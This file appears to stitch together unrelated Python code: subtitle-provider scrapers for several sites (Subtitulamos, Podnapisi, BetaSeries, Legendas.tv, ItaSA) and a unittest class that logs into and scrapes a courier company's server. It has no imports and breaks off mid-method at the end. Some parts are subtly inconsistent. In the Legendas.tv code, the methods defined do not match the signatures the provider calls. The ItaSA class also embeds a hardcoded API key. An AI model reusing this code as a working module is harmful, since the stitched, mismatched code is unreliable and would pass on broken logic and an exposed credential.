                    if datas[1].getText().count('(') == 3:
                        sub_version = datas[1].getText().split('(')[2].split(')')[0]

                    # One subtitle can be used for several releases
                    sub_releases = [s.strip() for s in sub_version.split(',')]
                    subtitle = self.subtitle_class(sub_language, sub_downloadlink, sub_id, sub_english_name.strip(),
                                                   sub_season, sub_episode, sub_version, sub_releases, sub_year,
                                                   asked_for_release_group=video.release_group,
                                                   asked_for_episode=episode)

                    logger.debug('Found subtitle: %r', subtitle)
                    subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        """Try the series title and each alternative title until one query
        yields results, throttling between attempts.

        Bugfix: previously fell off the end and returned None when no title
        produced results; now always returns a list.
        """
        titles = [video.series] + video.alternative_series

        for title in titles:
            subs = self.query(title, video.season, video.episode,
                              video.year, video=video)
            if subs:
                return subs

            time.sleep(self.multi_result_throttle)

        return []

    def download_subtitle(self, subtitle):
        """Download the archived subtitle and extract its content.

        :raises ProviderError: when the payload is neither rar nor zip.
        """
        r = self.session.get(subtitle.page_link, timeout=10)
        r.raise_for_status()

        # open the archive
        archive_stream = io.BytesIO(r.content)
        if is_rarfile(archive_stream):
            logger.debug('Archive identified as rar')
            archive = RarFile(archive_stream)
        elif is_zipfile(archive_stream):
            logger.debug('Archive identified as zip')
            archive = ZipFile(archive_stream)
        else:
            raise ProviderError('Unidentified archive type')

        subtitle.content = self.get_subtitle_from_archive(subtitle, archive)
class TestDownloader(TestCase):
    def setUp(self):
        """ Log into the remote server. """
        self.url = 'http://bamboo-mec.de/ll.php5'
        test_dir = dirname(__file__)
        self.directory = join(test_dir, 'temp')
        credentials = {'username': '******',
                       'password': '******'}
        self.session = Session()
        headers = {'user-agent': 'Mozilla/5.0'}
        self.session.headers.update(headers)
        response = self.session.post(self.url, credentials)
        if response.ok:
            print('Now logged into remote server.')
        else:
            print('Failed to log in')
            # NOTE(review): exit(1) aborts the whole test run; self.fail()
            # would be the conventional unittest way — confirm intent.
            exit(1)

    def tearDown(self):
        """ Logout. """
        # Say goodbye to the server
        url = 'http://bamboo-mec.de/index.php5'
        payload = {'logout': '1'}
        response = self.session.get(url, params=payload)
        # NOTE(review): response.history[0] raises IndexError when the
        # logout request was not redirected — confirm the server always 302s.
        if response.history[0].status_code == 302:
            # We have been redirected to the home page
            print('Logged out from remote server. Goodbye!')
        self.session.close()
        # Clean up the temp directory
        for file in listdir(self.directory):
            if search(self.day.strftime('%Y-%m-%d'), file):
                remove(join(self.directory, file))

    def testMiner(self):
        """ Check if the Miner class can download files correctly from the company server. """
        m = Miner(self.session, self.directory, overwrite=True)
        # pick a random day in 2014 to mine
        random_day = randint(1, 28)
        random_month = randint(1, 12)
        self.day = date(2014, random_month, random_day)
        print('Testing file download for %s.' % str(self.day))
        soups = m.mine(self.day)
        if not soups:
            # No jobs on that day... try again
            # NOTE(review): unbounded recursion — a long run of empty days
            # could exhaust the stack; a loop would be safer.
            self.testMiner()
        else:
            for soup in soups:
                self.assertIsInstance(soup.data, BeautifulSoup)
                self.assertIsInstance(soup.stamp.date, date)
                self.assertIsInstance(soup.stamp.uuid, str)
                order_detail = soup.data.find(id='order_detail')
                self.assertIsNotNone(order_detail)
class SubtitulamosProvider(Provider):
    """Subtitulamos Provider."""
    languages = {Language('por', 'BR')} | {
        Language(l)
        for l in ['cat', 'eng', 'glg', 'por', 'spa']
    }
    video_types = (Episode, )
    server_url = 'https://www.subtitulamos.tv/'
    search_url = server_url + 'search/query'

    def __init__(self):
        self.session = None

    def initialize(self):
        self.session = Session()
        self.session.headers[
            'User-Agent'] = 'Subliminal/%s' % __short_version__
        # self.session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 ' \
        #                                      'Firefox/56.0 '

    def terminate(self):
        self.session.close()

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_url_titles(self, series, season, episode, year=None):
        """Search the URL titles by kind for the given `title`, `season` and `episode`.

        :param str series: series to search for.
        :param int season: season to search for.
        :param int episode: episode to search for.
        :param int year: year to search for.
        :return: the episode URL.
        :rtype: str
        """
        # make the search
        logger.info('Searching episode url for %s, season %d, episode %d',
                    series, season, episode)
        episode_url = None

        search = '{} {}x{}'.format(series, season, episode)
        r = self.session.get(self.search_url,
                             headers={'Referer': self.server_url},
                             params={'q': search},
                             timeout=10)
        r.raise_for_status()

        # NOTE(review): unreachable after raise_for_status unless the server
        # answers a non-error, non-200 status — kept as defensive check.
        if r.status_code != 200:
            logger.error('Error getting episode url')
            raise ProviderError('Error getting episode url')

        results = json.loads(r.text)
        for result in results:
            title = sanitize(result['name'])

            # attempt series with year
            if sanitize('{} ({})'.format(series, year)) in title:
                for episode_data in result['episodes']:
                    if season == episode_data[
                            'season'] and episode == episode_data['number']:
                        episode_url = self.server_url + 'episodes/{}'.format(
                            episode_data['id'])
                        return episode_url
            # attempt series without year
            elif sanitize(series) in title:
                for episode_data in result['episodes']:
                    if season == episode_data[
                            'season'] and episode == episode_data['number']:
                        episode_url = self.server_url + 'episodes/{}'.format(
                            episode_data['id'])
                        return episode_url

        return episode_url

    def query(self, series, season, episode, year=None):
        """Fetch the episode page and build the list of subtitles on it."""
        # get the episode url
        episode_url = self._search_url_titles(series, season, episode, year)
        if episode_url is None:
            logger.error('No episode url found for %s, season %d, episode %d',
                         series, season, episode)
            return []

        r = self.session.get(episode_url,
                             headers={'Referer': self.server_url},
                             timeout=10)
        r.raise_for_status()
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # get episode title
        # NOTE(review): series/season are interpolated unescaped into the
        # pattern; regex metacharacters in a title would break the match.
        title_pattern = re.compile('{}(.+){}x{:02d}- (.+)'.format(
            series, season, episode).lower())
        title = title_pattern.search(
            soup.select('#episode_title')[0].get_text().strip().lower()).group(
                2)

        subtitles = []
        for sub in soup.find_all('div', attrs={'id': 'progress_buttons_row'}):
            # read the language
            language = Language.fromsubtitulamos(
                sub.find_previous(
                    'div', class_='subtitle_language').get_text().strip())
            hearing_impaired = False

            # modify spanish latino subtitle language to only spanish and set hearing_impaired = True
            # because if exists spanish and spanish latino subtitle for the same episode, the score will be
            # higher with spanish subtitle. Spanish subtitle takes priority.
            if language == Language('spa', 'MX'):
                language = Language('spa')
                hearing_impaired = True

            # read the release subtitle
            release = sub.find_next('div', class_='version_name').get_text().strip()

            # ignore incomplete subtitles
            status = sub.find_next('div', class_='subtitle_buttons').contents[1]
            if status.name != 'a':
                logger.debug('Ignoring subtitle in [%s] not finished', language)
                continue

            # read the subtitle url
            subtitle_url = self.server_url + status['href'][1:]
            subtitle = SubtitulamosSubtitle(language, hearing_impaired,
                                            episode_url, series, season,
                                            episode, title, year, release,
                                            subtitle_url)
            logger.debug('Found subtitle %r', subtitle)
            subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        """Provider entry point: query and filter by requested languages."""
        return [
            s for s in self.query(video.series, video.season, video.episode,
                                  video.year) if s.language in languages
        ]

    def download_subtitle(self, subtitle):
        # download the subtitle
        logger.info('Downloading subtitle %s', subtitle.download_link)
        r = self.session.get(subtitle.download_link,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        subtitle.content = fix_line_ending(r.content)
class PodnapisiProvider(Provider):
    """Provider for podnapisi.net using the legacy XML search API."""
    languages = ({Language('por', 'BR'), Language('srp', script='Latn')} |
                 {Language.fromalpha2(l) for l in language_converters['alpha2'].codes})
    video_types = (Episode, Movie)
    server_url = 'http://podnapisi.net/subtitles/'

    def initialize(self):
        self.session = Session()
        self.session.headers = {'User-Agent': 'Subliminal/%s' % get_version(__version__)}

    def terminate(self):
        self.session.close()

    def query(self, language, keyword, season=None, episode=None, year=None):
        """Search subtitles, walking all pages of the paginated results.

        :param language: the Language to search for.
        :param str keyword: series or movie title.
        :param season: season number for episode searches.
        :param episode: episode number for episode searches.
        :param year: release year, if known.
        :return: list of PodnapisiSubtitle.
        """
        # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652
        params = {'sXML': 1, 'sL': str(language), 'sK': keyword}
        is_episode = False
        if season and episode:
            is_episode = True
            params['sTS'] = season
            params['sTE'] = episode
        if year:
            params['sY'] = year

        # loop over paginated results
        logger.info('Searching subtitles %r', params)
        subtitles = []
        pids = set()
        while True:
            # query the server
            xml = etree.fromstring(self.session.get(self.server_url + 'search/old', params=params,
                                                    timeout=10).content)

            # exit if no results
            if not int(xml.find('pagination/results').text):
                logger.debug('No subtitles found')
                break

            # loop over subtitles
            for subtitle_xml in xml.findall('subtitle'):
                # read xml elements
                language = Language.fromietf(subtitle_xml.find('language').text)
                hearing_impaired = 'n' in (subtitle_xml.find('flags').text or '')
                page_link = subtitle_xml.find('url').text
                pid = subtitle_xml.find('pid').text
                releases = []
                if subtitle_xml.find('release').text:
                    for release in subtitle_xml.find('release').text.split():
                        releases.append(re.sub(r'\.+$', '', release))  # remove trailing dots
                title = subtitle_xml.find('title').text
                season = int(subtitle_xml.find('tvSeason').text)
                episode = int(subtitle_xml.find('tvEpisode').text)
                year = int(subtitle_xml.find('year').text)

                if is_episode:
                    subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
                                                 season=season, episode=episode, year=year)
                else:
                    subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title,
                                                 year=year)

                # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321
                if pid in pids:
                    continue

                logger.debug('Found subtitle %r', subtitle)
                subtitles.append(subtitle)
                pids.add(pid)

            # stop on last page
            if int(xml.find('pagination/current').text) >= int(xml.find('pagination/count').text):
                break

            # increment current page
            params['page'] = int(xml.find('pagination/current').text) + 1
            logger.debug('Getting page %d', params['page'])

        return subtitles

    def list_subtitles(self, video, languages):
        """Provider entry point: one query per requested language."""
        if isinstance(video, Episode):
            return [s for l in languages for s in self.query(l, video.series, season=video.season,
                                                             episode=video.episode, year=video.year)]
        elif isinstance(video, Movie):
            return [s for l in languages for s in self.query(l, video.title, year=video.year)]

    def download_subtitle(self, subtitle):
        """Download the subtitle as a single-file zip and unpack it."""
        # download as a zip
        # Bugfix: the %r placeholder previously had no corresponding
        # argument, which made this logging call fail to format.
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + subtitle.pid + '/download', params={'container': 'zip'}, timeout=10)
        r.raise_for_status()

        # open the zip
        with ZipFile(io.BytesIO(r.content)) as zf:
            if len(zf.namelist()) > 1:
                raise ProviderError('More than one file to unzip')

            subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class BetaSeriesProvider(Provider):
    """BetaSeries Provider (episode subtitles via the BetaSeries JSON API)."""
    languages = {Language(l) for l in ['fra', 'eng']}

    def __init__(self, token=None):
        # The API requires a key; fail fast when it is missing.
        if not token:
            raise ConfigurationError('Token must be specified')
        self.token = token

    def initialize(self):
        self.session = Session()
        self.session.headers = {
            'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2")
        }

    def terminate(self):
        self.session.close()

    def query(self, languages, video):
        """Query the BetaSeries API for subtitles of `video`.

        Uses the episode tvdb id when available, falling back to the series
        tvdb id plus season/episode numbers.

        :param languages: set of requested Language objects.
        :param video: the video to search subtitles for.
        :return: list of BetaSeriesSubtitle (empty when nothing matched).
        """
        # query the server
        if isinstance(video, Movie):
            logger.error(
                'It\'s not possible to search for a movie subtitle on BetaSeries'
            )
            return []
        elif isinstance(video, Episode):
            result = None
            if video.tvdb_id:
                params = {
                    'key': self.token,
                    'thetvdb_id': video.tvdb_id,
                    'v': 3.0,
                    'subtitles': 1
                }
                logger.debug('Searching subtitles %r', params)
                res = self.session.get(server_url + 'episodes/display',
                                       params=params,
                                       timeout=10)
                res.raise_for_status()
                result = res.json()
            elif video.series_tvdb_id:
                params = {
                    'key': self.token,
                    'thetvdb_id': video.series_tvdb_id,
                    'season': video.season,
                    'episode': video.episode,
                    'subtitles': 1,
                    'v': 3.0
                }
                logger.debug('Searching subtitles %r', params)
                res = self.session.get(server_url + 'shows/episodes',
                                       params=params,
                                       timeout=10)
                res.raise_for_status()
                result = res.json()

            # Bugfix: when the video had neither tvdb_id nor series_tvdb_id,
            # `result` stayed None and result['errors'] raised a TypeError.
            if result is None:
                logger.debug('No tvdb id available, skipping query')
                return []

            if result['errors'] != []:
                logger.debug('Status error: %r', result['errors'])
                return []

            # parse the subtitles
            subtitles = []
            if 'episode' in result:
                subs = result['episode']['subtitles']
            elif 'episodes' in result:
                subs = result['episodes'][0]['subtitles']
            else:
                return []

            for sub in subs:
                language = _translateLanguageCodeToLanguage(sub['language'])
                if language in languages:
                    # Filter seriessub source because it shut down so the links are all 404
                    if sub['source'] != 'seriessub':
                        subtitles.append(
                            BetaSeriesSubtitle(sub['id'], language,
                                               sub['file'], sub['url']))

            return subtitles

        # unsupported video type: nothing to search
        return []

    def list_subtitles(self, video, languages):
        """Provider entry point."""
        return self.query(languages, video)

    def download_subtitle(self, subtitle):
        """Download the subtitle, unpacking it when served as an archive."""
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(subtitle.download_link, timeout=10)
        r.raise_for_status()

        archive = _get_archive(r.content)
        subtitle_content = _get_subtitle_from_archive(
            archive) if archive else r.content

        if subtitle_content:
            subtitle.content = fix_line_ending(subtitle_content)
        else:
            logger.debug('Could not extract subtitle from %r', archive)
class LegendasTvProvider(Provider):
    """Provider for legendas.tv.

    Finds title candidates through the site's JSON suggestion endpoint,
    then scrapes the paginated subtitle listing pages for each candidate.
    Since listing entries only expose an archive (rar/zip), archives are
    downloaded during the query step to inspect the release names inside.

    :param str username: optional site username (must come with password).
    :param str password: optional site password (must come with username).
    """
    languages = {Language.fromlegendastv(l) for l in language_converters['legendastv'].codes}
    video_types = (Episode, Movie)
    server_url = 'http://legendas.tv'

    def __init__(self, username=None, password=None):
        # Credentials are all-or-nothing: anonymous use is allowed, but a
        # username without a password (or vice versa) is a config error.
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')
        self.username = username
        self.password = password
        self.logged_in = False

    def initialize(self):
        self.session = Session()

        # login
        if self.username is not None and self.password is not None:
            logger.info('Logging in')
            data = {'_method': 'POST', 'data[User][username]': self.username,
                    'data[User][password]': self.password}
            r = self.session.post('%s/login' % self.server_url, data, allow_redirects=False, timeout=TIMEOUT)
            r.raise_for_status()

            # The site can answer 200 on bad credentials; detect the error
            # banner in the returned HTML instead.
            soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
            auth_error = soup.find('div', {'class': 'alert-error'},
                                   text=re.compile(u'.*Usuário ou senha inválidos.*'))
            if auth_error:
                raise AuthenticationError(self.username)

            logger.debug('Logged in')
            self.logged_in = True

    def terminate(self):
        # logout
        if self.logged_in:
            logger.info('Logging out')
            r = self.session.get('%s/users/logout' % self.server_url, timeout=TIMEOUT)
            r.raise_for_status()
            logger.debug('Logged out')
            self.logged_in = False
        self.session.close()

    def matches(self, actual_properties, expected_title, expected_season=None, expected_episode=None,
                expected_year=None, ignore_episode=False):
        """
        Matches the `actual_properties` against the expected parameters.

        The `actual_properties` keys follow the guessit properties names.

        For movies:
            - `type` should match
            - `title` should match
            - `year` should match, unless they're not defined and expected and actual `title`s are equal

        For episodes:
            - `type` should match
            - `series` should match
            - `season` should match
            - `episode` should match, unless `ignore_episode` is True

        :param dict actual_properties: dictionary that contains the actual values following guessit property names.
        :param str expected_title: the expected movie/series title.
        :param int expected_season: the expected series season number.
        :param int expected_episode: the expected series episode number.
        :param int expected_year: the expected movie/series year.
        :param bool ignore_episode: `True` if episode matching should be ignored. Default: `False`.
        :return: Whether actual matches expected.
        :rtype: bool
        """
        # The presence of a season number is what decides movie vs episode.
        expected_type = 'episode' if expected_season else 'movie'

        if expected_type != actual_properties.get('type'):
            return False

        # Substring match on sanitized titles filters most mismatches.
        s_actual_title = sanitize(actual_properties.get('title'))
        s_expected_title = sanitize(expected_title)
        if not s_actual_title or not s_expected_title or s_expected_title not in s_actual_title:
            return False

        if expected_type == 'movie':
            if expected_year != actual_properties.get('year'):
                # Both years known and different: definite mismatch.
                if expected_year and actual_properties.get('year'):
                    return False
                # A year is missing on one side: require an exact title match.
                if s_expected_title != s_actual_title:
                    return False
        elif expected_type == 'episode':
            if expected_season != actual_properties.get('season'):
                return False
            if not ignore_episode and expected_episode != actual_properties.get('episode'):
                return False

        return True

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def search_candidates(self, title, season, episode, year):
        """
        Returns candidates for shows or movies by querying `/legenda/sugestao` page.

        Since the result is a list of candidates (movies, series, etc) an additional
        filtering is required. The properties type, name, year and season are used
        to filter out bad suggestions.

        :param str title: the movie/series title.
        :param int season: the series season number.
        :param int episode: the series episode number.
        :param int year: the movie/series year.
        :return: the candidates for shows or movies.
        :rtype: list of dict
        """
        results = dict()
        # Two keyword variants: fully sanitized and a lighter colon-stripped
        # form; results are deduplicated by their '_id'.
        for keyword in {sanitize(title), title.lower().replace(':', '')}:
            logger.info('Searching candidates using the keyword %s', keyword)
            r = self.session.get('%s/legenda/sugestao/%s' % (self.server_url, keyword), timeout=TIMEOUT)
            r.raise_for_status()
            results.update({item['_id']: item for item in json.loads(r.text)})

        # Get the shows/movies out of the suggestions.
        # JSON sample (one element, abridged):
        # {
        #   "_index": "filmes", "_type": "filme", "_id": "24551",
        #   "_source": {
        #       "id_filme": "24551", "id_imdb": "903747", "tipo": "S",
        #       "dsc_nome": "Breaking Bad", "dsc_data_lancamento": "2011",
        #       "dsc_nome_br": "Breaking Bad - 4\u00aa Temporada",
        #       "temporada": "4", ...
        #   }
        # }
        #
        # Notes:
        #   tipo: Defines if the entry is a movie or a tv show (or a collection??)
        #   id_imdb: Sometimes it appears as a number and sometimes as a string prefixed with tt
        #   temporada: Sometimes is ``null`` and season information should be extracted from dsc_nome_br

        # type, title, series, season, year: should follow guessit properties names
        mapping = dict(
            id='id_filme',
            type='tipo',
            title='dsc_nome',
            series='dsc_nome',
            season='temporada',
            year='dsc_data_lancamento',
            title_br='dsc_nome_br',
            imdb_id='id_imdb'
        )

        # movie, episode: should follow guessit type values
        type_map = {
            'M': 'movie',
            'S': 'episode',
            'C': 'episode'  # Considering C as episode. Probably C stands for Collections
        }

        # Regex to extract the season number. e.g.: 3\u00aa Temporada, 1a Temporada, 2nd Season
        season_re = re.compile('.*? - (\d{1,2}).*?((emporada)|(season))', re.IGNORECASE)

        # Regex to extract the IMDB id. e.g.: tt02342
        imdb_re = re.compile('t{0,2}(\d+)')

        candidates = []
        for result in results.values():
            entry = result['_source']
            item = {k: entry.get(v) for k, v in mapping.items()}
            item['type'] = type_map.get(item.get('type'), 'movie')
            # NOTE(review): imdb_re.search raises TypeError if 'id_imdb' is
            # missing/None in the payload — confirm the API always sends it.
            imdb_match = imdb_re.search(item.get('imdb_id'))
            item['imdb_id'] = imdb_match.group(1) if imdb_match else None

            # Season information might be missing and it should be extracted from 'title_br'
            if not item.get('season') and item.get('title_br'):
                season_match = season_re.search(item.get('title_br'))
                item['season'] = season_match.group(1) if season_match else None

            # Some string fields are actually integers
            for field in ['season', 'year', 'imdb_id']:
                field_text = item.get(field)
                item[field] = int(field_text) if field_text and field_text.isdigit() else None

            # ignoring episode match since this first step is only about movie/season information
            if self.matches(item, title, expected_season=season, expected_episode=episode,
                            expected_year=year, ignore_episode=True):
                candidates.append(dict(item))

        logger.debug('Candidates found: %s', candidates)
        return candidates

    def query(self, language, title, season=None, episode=None, year=None):
        """
        Returns a list of subtitles based on the input parameters.

        - 1st step: initial lookup for the movie/show information (see `search_candidates`)
        - 2nd step: list all candidates to movies/shows from previous step
        - 3rd step: reject candidates that doesn't match the input parameters (wrong season, wrong episode, etc...)
        - 4th step: download all subtitles to inspect the 'release name'
        - 5th step: creates a subtitle for each release

        :param language: the requested language
        :param str title: the movie/series title
        :param int season: the series season number
        :param int episode: the series episode number
        :param int year: the movie/series year
        :return: a list of subtitles that matches the query parameters
        :rtype: `list` of :class:`~subliminal.providers.LegendasTvSubtitle`
        """
        candidates = self.search_candidates(title, season, episode, year)

        # The language code used by legendas.tv
        language_code = language.legendastv

        # Regex to extract rating information (number of downloads and rate). e.g.: 12345 downloads, nota 10
        rating_info_re = re.compile('(\d*) downloads, nota (\d{0,2})')

        # Regex to extract the last update timestamp. e.g.: 25/12/2014 - 19:25
        timestamp_info_re = re.compile('(\d{1,2}/\d{1,2}/\d{2,4} \- \d{1,2}:\d{1,2})')

        # Regex to identify the 'pack' suffix that candidates might have. e.g.: (p)Breaking.Bad.S05.HDTV.x264
        pack_name_re = re.compile('^\(p\)')

        # Regex to extract the subtitle_id from the 'href'. e.g.: /download/560014472eb4d/foo/bar
        subtitle_href_re = re.compile('/download/(\w+)/.+')

        subtitles = []
        # loop over matched movies/shows
        for candidate in candidates:
            # page_url: {server_url}/util/carrega_legendas_busca_filme/{title_id}/{language_code}
            candidate_id = candidate.get('id')
            page_url = '%s/util/carrega_legendas_busca_filme/%s/%d' % (self.server_url, candidate_id, language_code)

            # loop over paginated results
            while page_url:
                # query the server
                r = self.session.get(page_url, timeout=TIMEOUT)
                r.raise_for_status()

                soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
                div_tags = soup.find_all('div', {'class': 'f_left'})

                # loop over each div which contains information about a single subtitle
                for div in div_tags:
                    a_tag = div.p.a
                    a_tag_text = a_tag.string if isinstance(a_tag.string, str) else a_tag.string.encode('utf-8')
                    # Removing forward-slashes from the candidate name (common practice in legendas.tv), since it
                    # misleads guessit to identify the candidate name as a file in a specific folder (which is wrong).
                    candidate_name = pack_name_re.sub('', a_tag_text).replace('/', '.')
                    page_link = a_tag['href']
                    subtitle_href_match = subtitle_href_re.search(page_link)
                    subtitle_id = subtitle_href_match.group(1) if subtitle_href_match else None
                    # A 'pack' entry bundles subtitles for several episodes.
                    multiple_episodes = bool(div.find_parent('div', {'class': 'pack'}) or
                                             pack_name_re.findall(a_tag_text))
                    featured = bool(div.find_parent('div', {'class': 'destaque'}))
                    rating_info_match = rating_info_re.search(div.text)
                    no_downloads_text = rating_info_match.group(1) if rating_info_match else None
                    no_downloads = int(no_downloads_text) \
                        if no_downloads_text and no_downloads_text.isdigit() else None
                    rating_text = rating_info_match.group(2) if rating_info_match else None
                    rating = int(rating_text) if rating_text and rating_text.isdigit() else None
                    timestamp_info_match = timestamp_info_re.search(div.text)
                    timestamp_text = timestamp_info_match.group(1) if timestamp_info_match else None
                    timestamp = datetime.strptime(timestamp_text, '%d/%m/%Y - %H:%M') if timestamp_text else None

                    # Using the candidate name to filter out bad candidates
                    # (wrong type, wrong episode, wrong season or even wrong title)
                    guess = guessit(candidate_name, {'type': candidate.get('type')})
                    if not self.matches(guess, expected_title=title, expected_season=season,
                                        expected_episode=episode, expected_year=year,
                                        ignore_episode=multiple_episodes):
                        continue

                    # Unfortunately, the only possible way to know the release names of a specific candidate is to
                    # download the compressed file (rar/zip) and list the file names.
                    handler = LegendasTvArchiveHandler(self)
                    subtitle_names = handler.get_subtitle_names(subtitle_id, timestamp)
                    if not subtitle_names:
                        continue

                    for name in subtitle_names:
                        # Filtering out bad candidates (one archive might contain subtitles for the whole season,
                        # therefore this filtering is necessary)
                        guess = guessit(os.path.splitext(name)[0], {'type': candidate.get('type')})
                        if not self.matches(guess, expected_title=title, expected_season=season,
                                            expected_episode=episode, expected_year=year):
                            continue

                        subtitle = LegendasTvSubtitle(language, page_link, subtitle_id, name,
                                                      handler.binary_content,
                                                      imdb_id=candidate.get('imdb_id'),
                                                      type=candidate.get('type'),
                                                      season=candidate.get('season'),
                                                      year=candidate.get('year'),
                                                      no_downloads=no_downloads,
                                                      rating=rating,
                                                      featured=featured,
                                                      multiple_episodes=multiple_episodes,
                                                      timestamp=timestamp)
                        logger.debug('Found subtitle %s', subtitle)
                        subtitles.append(subtitle)

                next_page_link = soup.find('a', attrs={'class': 'load_more'}, text='carregar mais')
                page_url = self.server_url + next_page_link['href'] if next_page_link else None

        # High quality subtitles should have higher precedence when their scores are equal.
        subtitles.sort(key=lambda s: (s.featured, s.no_downloads, s.rating, s.multiple_episodes), reverse=True)

        return subtitles

    def list_subtitles(self, video, languages):
        """
        Returns a list of subtitles for the defined video and requested languages

        :param video: the video to search subtitles for.
        :param languages: the requested languages
        :return: a list of subtitles for the requested video and languages
        :rtype : `list` of :class:`~subliminal.providers.LegendasTvSubtitle`
        """
        season = episode = None
        if isinstance(video, Episode):
            title = video.series
            season = video.season
            episode = video.episode
        else:
            title = video.title
        year = video.year

        return [s for l in languages
                for s in self.query(l, title, season=season, episode=episode, year=year)]

    def get_subtitle_names(self, content):
        """
        Returns all subtitle names for the given rar/zip binary content.

        :param content: the downloaded binary content (rar/zip)
        :return: list of subtitle names
        :rtype: `list` of `string`
        """
        return self._uncompress(
            content,
            lambda cf: [f for f in cf.namelist()
                        if 'legendas.tv' not in f.lower() and f.lower().endswith(SUBTITLE_EXTENSIONS)])

    def extract_subtitle(self, content, subtitle_name):
        """
        Extract the subtitle content from the compressed file. The file is downloaded, the
        subtitle_name is uncompressed and its contents is returned.

        :param content: the downloaded binary content (rar/zip)
        :param str subtitle_name: the filename to be extracted
        :return: the subtitle content
        :rtype : `string`
        """
        return self._uncompress(content, lambda cf, name: fix_line_ending(cf.read(name)), subtitle_name)

    def _uncompress(self, content, function, *args, **kwargs):
        # Detect rar vs zip from the bytes themselves and apply `function` to
        # the opened archive; returns None when the content is neither format.
        bc = io.BytesIO(content)
        cf = RarFile(bc) if is_rarfile(bc) else (ZipFile(bc) if is_zipfile(bc) else None)
        return function(cf, *args, **kwargs) if cf else None

    def download_content(self, subtitle_id, timestamp):
        """
        Downloads the compressed file for the specified subtitle_id. The timestamp is
        required in order to avoid the cache when the compressed file is updated (it's
        a common practice in legendas.tv to update the archive with new subtitles)

        :param str subtitle_id: the id used to download the compressed file
        :param str timestamp: represents the last update timestamp of the file
        :return: the downloaded file
        :rtype : `bytearray`
        """
        logger.debug('Downloading subtitle_id %s. Last update on %s', subtitle_id, timestamp)
        r = self.session.get('%s/downloadarquivo/%s' % (self.server_url, subtitle_id), timeout=TIMEOUT)
        r.raise_for_status()

        return r.content

    def download_subtitle(self, subtitle):
        # Reuse the archive bytes captured during query() when available,
        # otherwise download the archive again.
        bc = subtitle.binary_content if subtitle.binary_content else \
            self.download_content(subtitle.subtitle_id, subtitle.timestamp)
        subtitle.content = self.extract_subtitle(bc, subtitle.name)
class ItaSAProvider(Provider):
    """Provider for italiansubs.net (ItaSA) — Italian subtitles for TV episodes.

    Uses the ItaSA REST API (XML responses parsed with `etree`) plus a
    regular website login to be allowed to download subtitle zips.

    :param str username: site username (must come with password).
    :param str password: site password (must come with username).
    """
    languages = {Language('ita')}
    video_types = (Episode, )
    server_url = 'https://api.italiansubs.net/api/rest/'
    apikey = 'd86ad6ec041b334fac1e512174ee04d5'

    def __init__(self, username=None, password=None):
        # Credentials are all-or-nothing.
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')
        self.username = username
        self.password = password
        self.logged_in = False
        self.login_itasa = False
        self.session = None
        self.auth_code = None

    def initialize(self):
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/%s' % __version__

        # login
        if self.username is not None and self.password is not None:
            logger.info('Logging in')
            # API login: yields the authcode needed for downloads.
            params = {
                'username': self.username,
                'password': self.password,
                'apikey': self.apikey
            }
            r = self.session.get(self.server_url + 'users/login', params=params,
                                 allow_redirects=False, timeout=10)
            root = etree.fromstring(r.content)

            if root.find('status').text == 'fail':
                raise AuthenticationError(root.find('error/message').text)

            self.auth_code = root.find('data/user/authcode').text

            # Website login: sets the cookies required by the download endpoint.
            data = {
                'username': self.username,
                'passwd': self.password,
                'remember': 'yes',
                'option': 'com_user',
                'task': 'login',
                'silent': 'true'
            }
            r = self.session.post('http://www.italiansubs.net/index.php', data=data,
                                  allow_redirects=False, timeout=30)
            r.raise_for_status()

            self.logged_in = True

    def terminate(self):
        self.session.close()
        self.logged_in = False

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict
        """
        # get the show page
        logger.info('Getting show ids')
        params = {'apikey': self.apikey}
        r = self.session.get(self.server_url + 'shows', timeout=10, params=params)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        # populate the show ids
        show_ids = {}
        for show in root.findall('data/shows/show'):
            if show.find('name').text is None:  # pragma: no cover
                continue
            show_ids[sanitize(show.find('name').text).lower()] = int(
                show.find('id').text)
        logger.debug('Found %d show ids', len(show_ids))

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series):
        """Search the show id from the `series`

        :param str series: series of the episode.
        :return: the show id, if found.
        :rtype: int or None
        """
        # build the param
        params = {'apikey': self.apikey, 'q': series}

        # make the search
        logger.info('Searching show ids with %r', params)
        r = self.session.get(self.server_url + 'shows/search', params=params, timeout=10)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Show id not found: no suggestion')
            return None

        # Looking for show in first page
        for show in root.findall('data/shows/show'):
            if sanitize(show.find('name').text).lower() == sanitize(
                    series.lower()):
                show_id = int(show.find('id').text)
                logger.debug('Found show id %d', show_id)

                return show_id

        # Not in the first page of result try next (if any)
        next_page = root.find('data/next')
        while next_page.text is not None:  # pragma: no cover
            r = self.session.get(next_page.text, timeout=10)
            r.raise_for_status()
            root = etree.fromstring(r.content)
            logger.info('Loading suggestion page %r', root.find('data/page').text)

            # Looking for show in following pages
